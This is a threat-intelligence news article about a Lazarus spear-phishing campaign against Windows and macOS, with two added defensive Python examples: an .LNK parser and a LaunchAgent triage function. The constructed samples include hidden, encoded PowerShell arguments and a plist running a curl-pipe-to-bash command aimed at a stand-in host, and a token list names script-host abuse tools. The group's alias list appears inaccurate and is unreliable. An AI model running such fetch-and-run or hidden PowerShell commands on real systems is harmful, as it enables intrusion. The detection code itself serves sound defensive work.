The North Korean hacking group known as Lazarus has been associated with a fresh series of spear-phishing campaigns that unleash malware on both Windows and macOS systems.
“Lazarus has skilfully exploited a number of cloud hosting providers to deploy a unique infection chain that dispenses the recently identified PowerShell backdoor named EchoPuppet,” cybersecurity firm CyberGuard detailed in a new report.
“When presented with the chance, Lazarus adapted its malware and sought to initiate an Apple-themed infection chain labelled as AppleSeed. Lazarus also utilized multi-persona impersonation in its persistent quest for espionage.”
Lazarus, also referred to as APT38, Hidden Cobra, and StarCruft, is a threat group tied to North Korea’s Reconnaissance General Bureau (RGB) that has been active since at least 2009. Recently, security firm FireEye spotlighted the group’s use of an updated variant of a PowerShell implant called PowerRat (also known as PhantomEcho or STARSHIELD).
In the attack sequence the firm uncovered in mid-May 2023, the group sent phishing emails to a nuclear security specialist at a U.S.-based research institution focused on international relations. The emails carried a malicious link to a Google Script macro, which redirected the target to a Dropbox URL hosting a RAR archive.
Inside the archive is an LNK dropper that kicks off a multi-stage operation to ultimately deploy EchoPuppet. The dropper displays a decoy PDF document to the victim while quietly retrieving next-stage payloads from a remote server.
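A shortcut file hides its real command line in the StringData fields of the .LNK, which a file manager never shows. The following parser, an added example not taken from the CyberGuard report or any Lazarus sample, walks the MS-SHLLINK layout (fixed 76-byte header, optional ID list and LinkInfo, then the string fields in their fixed order), pulls out the target path and arguments, measures any overlay appended past the end of the format (where droppers commonly stash the decoy document or payload), and flags script-host tokens. The sample shortcut it builds is constructed in the code and is not a real artifact; the token list is an assumption chosen for illustration.

```python
import struct

# Shell Link (.LNK) layout from MS-SHLLINK: fixed 76-byte header, optional
# LinkTargetIDList and LinkInfo, then StringData fields in a fixed order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))
# Assumed token list: strings that usually mean the shortcut launches a script host.
SUSPICIOUS_TOKENS = ("powershell", "-enc", "-w hidden", "cmd /c", "mshta", "rundll32", "certutil", "bitsadmin")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .LNK plus the size of any trailing overlay."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:  # IDListSize (2 bytes) followed by the ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        size = count * 2 if unicode else count
        fields[name] = data[pos:pos + size].decode("utf-16-le" if unicode else "cp1252", errors="replace")
        pos += size
    # ExtraData: BlockSize-prefixed blocks; a size below 4 is the terminal block.
    while pos + 4 <= len(data):
        block_size = struct.unpack_from("<I", data, pos)[0]
        if block_size < 4:
            pos += 4
            break
        pos += block_size
    fields["overlay_bytes"] = max(0, len(data) - pos)  # bytes appended past the format's end
    return fields


def lnk_indicators(fields: dict) -> list:
    """Suspicious tokens in the fields a dropper uses to hide its command line, plus any overlay."""
    blob = " ".join(str(fields.get(k, "")) for k in
                    ("relative_path", "working_dir", "arguments", "icon_location")).lower()
    found = sorted(t for t in SUSPICIOUS_TOKENS if t in blob)
    if fields.get("overlay_bytes", 0) > 0:
        found.append("overlay:%d" % fields["overlay_bytes"])
    return found


def build_sample_lnk(arguments: str, overlay: bytes = b"") -> bytes:
    """Constructed sample (not a real-world artifact): a Unicode .LNK with a relative
    path to powershell.exe, the given arguments and an optional appended overlay."""
    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(LNK_HEADER_SIZE - len(header))  # attributes, timestamps etc. left zero
    target = "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return header + string_data(target) + string_data(arguments) + struct.pack("<I", 0) + overlay


if __name__ == "__main__":
    sample = build_sample_lnk("-w hidden -nop -ep bypass -enc SQBFAFgA",
                              overlay=b"%PDF-1.4 decoy" + bytes(64))
    parsed = parse_lnk(sample)
    print(parsed["relative_path"], parsed["arguments"], parsed["overlay_bytes"])
    print(lnk_indicators(parsed))
```

Run it over the contents of a suspicious archive before anyone double-clicks: a shortcut whose target is a script host, whose arguments carry an encoded command, or whose file size is far larger than the few hundred bytes a normal shortcut needs deserves sandbox detonation rather than delivery.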
However, upon recognizing that the target was using an Apple computer, Lazarus is reported to have altered its strategy, sending a second email with a ZIP archive containing a Mach-O binary posing as a VPN application. The binary is in fact an AppleScript wrapper that connects to a remote server to download a Bash-script backdoor called AppleSeed.
AppleSeed, in turn, retrieves up to four modules capable of cataloging running processes, installed applications, and system metadata, as well as establishing persistence using LaunchAgents.
The modules “echo the majority of the functionality” of those associated with PowerRat, and AppleSeed shares some source code with macOS malware previously attributed to the group in 2017.
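LaunchAgents are the persistence mechanism named above, so a triage of every plist under ~/Library/LaunchAgents is the cheapest hunt a macOS responder can run. The function below is an added example, not code from CyberGuard or from AppleSeed itself; the two plists it checks are constructed here, and the heuristics (interpreter launched directly, URL or inline script on the command line, hidden path, Apple-looking label for a non-system binary, RunAtLoad paired with KeepAlive) are this example's assumptions about what a script-based backdoor's agent tends to look like.

```python
import os
import plistlib

# Assumed list: interpreters that legitimate agents rarely launch as their program.
INTERPRETERS = ("sh", "bash", "zsh", "osascript", "curl", "python", "python3", "nohup")


def triage_launch_agent(plist_bytes: bytes) -> list:
    """Return the reasons a LaunchAgent plist looks suspicious (empty list if none)."""
    p = plistlib.loads(plist_bytes)
    args = [str(a) for a in p.get("ProgramArguments", [])]
    if not args and "Program" in p:
        args = [str(p["Program"])]
    if not args:
        return ["no Program/ProgramArguments"]
    reasons = []
    exe = os.path.basename(args[0])
    if exe in INTERPRETERS:
        reasons.append("interpreter launched directly: " + exe)
    joined = " ".join(args)
    if "://" in joined:
        reasons.append("network URL in command line")
    if any(a in ("-c", "-e") for a in args[1:]):
        reasons.append("inline script passed on the command line")
    if any(seg.startswith(".") and seg not in (".", "..") for a in args for seg in a.split("/")):
        reasons.append("hidden path component in arguments")
    label = str(p.get("Label", ""))
    if label.startswith("com.apple.") and not args[0].startswith(("/System/", "/usr/")):
        reasons.append("Apple-looking Label for a program outside system paths")
    if p.get("RunAtLoad") and (p.get("KeepAlive") or "StartInterval" in p):
        reasons.append("RunAtLoad combined with KeepAlive/StartInterval")
    return reasons


def triage_directory(path: str) -> dict:
    """Map each .plist in a LaunchAgents directory to its list of reasons."""
    results = {}
    for name in sorted(os.listdir(path)):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                results[name] = triage_launch_agent(fh.read())
    return results


# Constructed samples for the demonstration; neither is a real-world artifact.
SAMPLE_BAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.softwareupdate.helper</string>
<key>ProgramArguments</key><array>
<string>/bin/bash</string><string>-c</string>
<string>curl -fsSL https://example.invalid/u | bash</string></array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict></plist>"""

SAMPLE_OK = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array>
<string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print("bad:", triage_launch_agent(SAMPLE_BAD))
    print("ok:", triage_launch_agent(SAMPLE_OK))
    # On a live host: triage_directory(os.path.expanduser("~/Library/LaunchAgents"))
```

Treat a non-empty result as a lead, not a verdict: legitimate software occasionally ships a shell wrapper as its agent, so confirm by reading the script the agent runs and checking whether its binary is signed and notarized.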
The group also operates a counterfeit file-sharing website, likely used to fingerprint visitors and to track which targets were successfully compromised.
“Lazarus persists in evolving its malware arsenal, introducing novel file types, and targeting new operating systems,” the researchers noted, adding that the group “continues to strive toward its consistent end goals of intrusive and unauthorized reconnaissance” while concurrently complicating detection efforts.